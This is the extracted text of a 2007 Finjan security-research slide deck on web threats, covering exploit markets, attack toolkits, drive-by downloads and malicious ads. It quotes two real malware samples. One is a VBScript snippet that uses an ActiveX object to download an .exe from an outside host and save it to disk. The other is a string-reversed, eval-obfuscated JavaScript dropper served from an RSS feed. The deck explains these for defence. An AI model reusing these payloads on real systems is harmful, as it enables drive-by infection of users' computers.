Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.
Jan 11, 2016
Latest Threats and Attacks in Web Security
Iftach Ian Amit
Director, Security Research
Finjan inc.
Finjan Latest Threats – Greek ICT Forum 20072
The Business Behind New Exploits
Finjan Latest Threats – Greek ICT Forum 20073
IE Vulnerability For Sale
Finjan Latest Threats – Greek ICT Forum 2007
Buying Vulnerabilities
4
Finjan Latest Threats – Greek ICT Forum 2007
Exploits Selling Service
5
Finjan Latest Threats – Greek ICT Forum 2007
Exploits Selling Service
6
Finjan Latest Threats – Greek ICT Forum 20077
Web Attacker Toolkit - Website
Finjan Latest Threats – Greek ICT Forum 20078
Web Attacker Toolkit – AV Will Not Detect It
Finjan Latest Threats – Greek ICT Forum 20079
Web Attacker Toolkit – Order Page
Finjan Latest Threats – Greek ICT Forum 200710
Web Attacker Toolkit – Statistics Report
Finjan Latest Threats – Greek ICT Forum 2007
Neo Sploit
Updating the ‘customer’ when new versions are available
The recent ‘Release note’ log
Important update! Please update our product to v1.0.6 RC! 24 April 2007- fixed crypt algorithm
16 April 2007- new exploit module added- removed ANI exploit- fixed crypt algorithm
11 April 2007- new exploit module added- fixed crypt algorithm
31 March 2007- new exploit module added
22 March 2007- new exploit module added
11
Finjan Latest Threats – Greek ICT Forum 2007
MPack Toolkit – Statistics Report
12
Finjan Latest Threats – Greek ICT Forum 2007
Multi Exploit Pack
13
Finjan Latest Threats – Greek ICT Forum 2007
Where are the Malicious Servers?
Geo footprint of a single MPack toolkit operator
14
Finjan Latest Threats – Greek ICT Forum 200715
Drive-by, While Visiting Websites
Innocent Free Games site
Finjan Latest Threats – Greek ICT Forum 200716
Drive-by, While Visiting Websites
Innocent Free Games site
Exploits our desktop to install a Trojan
Finjan Latest Threats – Greek ICT Forum 200717
Drive-by, While Visiting Websites
Dynamic Code Obfuscation
Each user session includes a different exploit content
Finjan Latest Threats – Greek ICT Forum 200718
Drive-by, While Visiting Websites
Free Whois service ….
Finjan Latest Threats – Greek ICT Forum 200719
Drive-by, While Visiting Websites
1. Exploits the Internet Explorer VML vulnerability
2. Downloads a spyware
3. Downloads a malicious JPG file – Trojan.JS.Psyme.ct
4. Checks the type of Anti-Virus installed
5. Injects a virus that the installed Anti-Virus does not detect
Finjan Latest Threats – Greek ICT Forum 2007
AJAX-Based Exploits in the Wild, Hosted in the US
20
http ://7dias.t35.com/index2.php (Free Web Hosting, IP: 66.45.237.220, Hosted at: Secaucus, New Jersey, USA)
Finjan Latest Threats – Greek ICT Forum 2007
AJAX-Based Exploits in the Wild, Hosted in the US
dl = "http://gigafoto.front.ru/pr.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
str1= "Ado“+ "db.“+ "Str“+ “eam“
str5=str1
set S = df.createobject(str5,"")
str6="GET"
x.Open str6, dl, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
21
AJAX request goes undetected
The Trojan to be downloaded
Escape from Anti-Virus signatures
Save Trojan on the victim’s disk
Finjan Latest Threats – Greek ICT Forum 2007
Distributing Malicious Code Using Ads
22
Finjan Latest Threats – Greek ICT Forum 2007
The Malicious Ad
23
Finjan Latest Threats – Greek ICT Forum 2007
Trojan-Based Affiliation Program
24
Finjan Latest Threats – Greek ICT Forum 2007
Trojan-Based Affiliation Program
25
Finjan Latest Threats – Greek ICT Forum 2007
Trojan-Based Affiliation Program – in Action
26
Finjan Latest Threats – Greek ICT Forum 2007
Trojan-Based Affiliation Program
27
Finjan Latest Threats – Greek ICT Forum 2007
How it looks like in the field?
28
Finjan Latest Threats – Greek ICT Forum 2007
Keeping all this activity under control:Evasive attacks!
29
Finjan Latest Threats – Greek ICT Forum 2007
Trojan’s Log
30
Finjan Latest Threats – Greek ICT Forum 200731
Trojan’s Log for Sale
Finjan Latest Threats – Greek ICT Forum 200732
Reactive Security Technologies…
SignaturesSignatures HeuristicsHeuristics URL CATURL CAT
They detect known attacks quickly…
BUT THEY
Do not stop the next attack
Do not stop a targeted attack
Require frequent updates
Require huge signature / URL databases
The next wave of attack
A targeted attack
The next wave of attack
A targeted attack
Finjan Latest Threats – Greek ICT Forum 2007
RSS Feed – Malicious Code, Reversed
http://www.tv-personalonline.com/rss2/rss.php
var fname = "C:\\mssync20.exe";var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");RE("");
var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");RE(";)'r_','di'(etubirttAtes.r_"); RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_");
var is_ok= 0;try{
var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");is_ok= 1;
}catch(e){}
if (is_ok!= 1){
try{
var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");is_ok= 1;
}catch(e){}
}
33
Finjan Latest Threats – Greek ICT Forum 2007
function RE(s) { return eval(RV(s)); }
function RV(s){
var rev = "";for (i = 0; i < s.length; i++){
rev = s.charAt(i) + rev; }return rev;
}
RSS Feed – Malicious Code Reversed
Reversed functions
34
Finjan Latest Threats – Greek ICT Forum 2007
RSS Feed – Malicious Code Reversed
Reverse malicious code – undetected !! ‘Actual’ Malicious code – detected (7 out of 31)
35
Finjan Latest Threats – Greek ICT Forum 2007
Recent Example
Finjan Latest Threats – Greek ICT Forum 200737
Finjan‘s Technology Real-Time Content Inspection (Patented)
Inspecting incoming & outgoing code to detect potentially malicious operations (Delete file, Install program, Change settings, etc.)
Finjan Latest Threats – Greek ICT Forum 200738
Audit Results at Customer Networks
Thank you